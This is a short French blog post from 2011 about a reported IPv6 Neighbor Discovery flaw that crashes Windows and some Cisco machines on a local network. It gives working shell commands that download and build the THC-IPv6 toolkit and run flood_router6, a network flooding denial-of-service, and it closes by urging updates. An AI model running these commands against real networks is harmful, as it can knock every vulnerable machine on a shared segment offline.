Une faille dans le Neighbor Discovery de IPv6

Un article de Thomas    2946Aucun commentairehttp%3A%2F%2Fwww.gizeek.com%2F2011%2F03%2F28%2Fune-faille-dans-le-neighbor-discovery-de-ipv6%2FUne+faille+dans+le+Neighbor+Discovery+de+IPv62011-03-28+14%3A00%3A25Thomashttp%3A%2F%2Fwww.gizeek.com%2F%3Fp%3D2946

V

ous le savez les adresses IPv6 vont progressivement remplacer nos bonnes vieilles adresses IPv4. IPv6 intègre le protocole ND (pour Neighbor Discovery) qui permet, pour simplifier, de découvrir les machines et routeurs présents sur le même segment de réseau ainsi que de savoir quels systèmes sont inaccessibles. Une faille vient d’être découverte sur ce protocole.

Cette faille permettrait de faire planter toutes les machines Windows présentent sur le réseau en même temps que des équipements Cisco et 3DM, les machines sous Linux ne seraient apparemment pas touchées par cette faille.
Sébastien de Tux-planet nous montre comment tester cette faille sous Ubuntu:

sudo apt-get install libpcap0.8-dev libssl-dev
wget http://freeworld.thc.org/releases/thc-ipv6-1.4.tar.gz
tar zxvf thc-ipv6-*.tar.gz && rm -f thc-ipv6-*.tar.gz
cd thc-ipv6-*
make
sudo ./flood_router6 eth0 

Le meilleur moyen pour se protéger de cette faille reste le même: mettre impérativement à jour vos équipements !

Source: Tux-planet

Articles Similaires:

• Mise au point sur IPv4 et IPv6
• [Tuto]LTSP: Serveur Linux et clients légers…
• [Tuto] Exécuter Windows sous Ubuntu 10.10 avec Virtualbox 4
• [Tuto]Centralisation et gestion des logs avec rsyslog et Loganalyzer
• [Tuto] Proxy IpCop: Filtrage d’URL